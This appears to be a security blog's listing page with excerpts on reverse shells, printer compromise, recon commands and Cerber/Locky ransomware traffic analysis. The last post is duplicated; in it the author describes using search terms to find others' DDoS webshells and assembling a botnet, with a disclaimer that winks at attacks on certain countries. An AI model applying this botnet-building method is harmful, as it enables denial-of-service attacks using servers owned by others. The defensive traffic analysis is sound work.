Penetration Testing Red Team Reverse Shell Cheat Sheet

If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port.  This page deals with the former. Your options for creating a reverse shell are limited … Read more Penetration Testing Red Team Reverse Shell Cheat Sheet



Are your printers secure? Cyber Security Video how Hackers are hacking Printers and Backdooring them

Watch this hacker find an unsuspecting target – A PRINTER! and compromise it using the web admin portal and load tools onto the printer to further compromise printers and use a DDoS tool from the printer. Most assessments that I have been on and through consulting I have made it a priority to print a … Read more Are your printers secure? Cyber Security Video how Hackers are hacking Printers and Backdooring them



Penetration Testing Reconassaince Command Line Tricks Dig, Mass Domain Resolution, Ping Sweeping

Here are some simple command line tricks to help while doing recon on your target network/host A simple way to automatically resolve domain names, can be used with a for loop to resolve a massive list of domain names, you can also add a cronjob and create an .out file if you want to track … Read more Penetration Testing Reconassaince Command Line Tricks Dig, Mass Domain Resolution, Ping Sweeping



BRO vs Snort IDS Locky Ransomware tcpdump Traffic Sample Data Packet Analysis

(PCAP and Binary samples available with their usual password and location) Bro and Snort are completely different types of applications although they are commonly compared against one another. From a network security standpoint Snort can’t do much to detect new malware variants, obfuscation TTPs and other non-low hanging fruit we haven’t created a signature for. … Read more BRO vs Snort IDS Locky Ransomware tcpdump Traffic Sample Data Packet Analysis



Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Example of files that were encrypted and protected: The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1 E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; … Read more Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE



CERBER Ransomware Hidden C2 Servers Traffic and Malware Analysis

Cerber ransomware has been one of the most prolific crimeware botnets to have arisen, it is currently generating an estimated $2.5 million dollars a year and rising. Once infected, your content is encrypted and held for ransom as the name implies. You will see an image popup with instructions on how to reclaim your data … Read more CERBER Ransomware Hidden C2 Servers Traffic and Malware Analysis



********RESEARCH ONLY – DO NOT TRY ANYTHING I AM ABOUT TO DO AS YOU WILL MOST LIKELY END UP IN JAIL, I DO NOT ENDORSE NOR CONDONE DoS ATTACKS OR HACKING WEBSERVERS YOU DO NOT HAVE PERMISSION TO DO SO – HOWEVER IF THEY ARE AGAINST IRAN OR NORTH KOREA I WOULD LOOK THE OTHER WAY – I TAKE IN NO WAY RESPONSIBILITY FOR ANYTHING ILLEGAL YOU ARE ABLE TO DO WITH THIS INFORMATION ******* So, basically, I did some research on DoS webshells and quickly found some popular ones such as phpDOS, Grenshell and a few other less popular labeled *PRIVATE* *NOT FOR RELEASE* which that obviously didn’t turn out well. Additionally, kiddies are arrogant and lazy so I wanted to do searches for file names that ended or included “ddos, dos, attack, stresser, packet, etc” *.php|.asp|.jsp|.cfm. But why stop there, I also wanted to include in text strings such as “Start the attack” “Flood victim” “DoS Victim” “Victim IP”, etc. So armed with some information, it was time to see if I could build a botnet, using a custom python script and a multiple TOR nodes through a VPN I could link all hacked shells and launch a single DDoS at any target I desired. So, just to prove my point, here are a few screen shots, I was able to locate 178 available bots and judging by uplinks combined they should deliver well over 50gbs/sec – maybe more. This took me less than 4 hours to build a botnet and be able to control it without hacking a thing. The internet is broken, kiddies can repeat the same type of actions and take down large networks with ease. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 Capture shell Share Button Email inShare Category: DoS,DDoS,DrDoS Tags: *FOR RESEARCH* I Built a 50gbs+/sec DDoS Net using just GOOGLE Without Hacking Anything

********RESEARCH ONLY – DO NOT TRY ANYTHING I AM ABOUT TO DO AS YOU WILL MOST LIKELY END UP IN JAIL, I DO NOT ENDORSE NOR CONDONE DoS ATTACKS OR HACKING WEBSERVERS YOU DO NOT HAVE PERMISSION TO DO SO – HOWEVER IF THEY ARE AGAINST IRAN OR NORTH KOREA I WOULD LOOK THE OTHER WAY – … Read more ********RESEARCH ONLY – DO NOT TRY ANYTHING I AM ABOUT TO DO AS YOU WILL MOST LIKELY END UP IN JAIL, I DO NOT ENDORSE NOR CONDONE DoS ATTACKS OR HACKING WEBSERVERS YOU DO NOT HAVE PERMISSION TO DO SO – HOWEVER IF THEY ARE AGAINST IRAN OR NORTH KOREA I WOULD LOOK THE OTHER WAY – I TAKE IN NO WAY RESPONSIBILITY FOR ANYTHING ILLEGAL YOU ARE ABLE TO DO WITH THIS INFORMATION ******* So, basically, I did some research on DoS webshells and quickly found some popular ones such as phpDOS, Grenshell and a few other less popular labeled *PRIVATE* *NOT FOR RELEASE* which that obviously didn’t turn out well. Additionally, kiddies are arrogant and lazy so I wanted to do searches for file names that ended or included “ddos, dos, attack, stresser, packet, etc” *.php|.asp|.jsp|.cfm. But why stop there, I also wanted to include in text strings such as “Start the attack” “Flood victim” “DoS Victim” “Victim IP”, etc. So armed with some information, it was time to see if I could build a botnet, using a custom python script and a multiple TOR nodes through a VPN I could link all hacked shells and launch a single DDoS at any target I desired. So, just to prove my point, here are a few screen shots, I was able to locate 178 available bots and judging by uplinks combined they should deliver well over 50gbs/sec – maybe more. This took me less than 4 hours to build a botnet and be able to control it without hacking a thing. The internet is broken, kiddies can repeat the same type of actions and take down large networks with ease. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 Capture shell Share Button Email inShare Category: DoS,DDoS,DrDoS Tags: *FOR RESEARCH* I Built a 50gbs+/sec DDoS Net using just GOOGLE Without Hacking Anything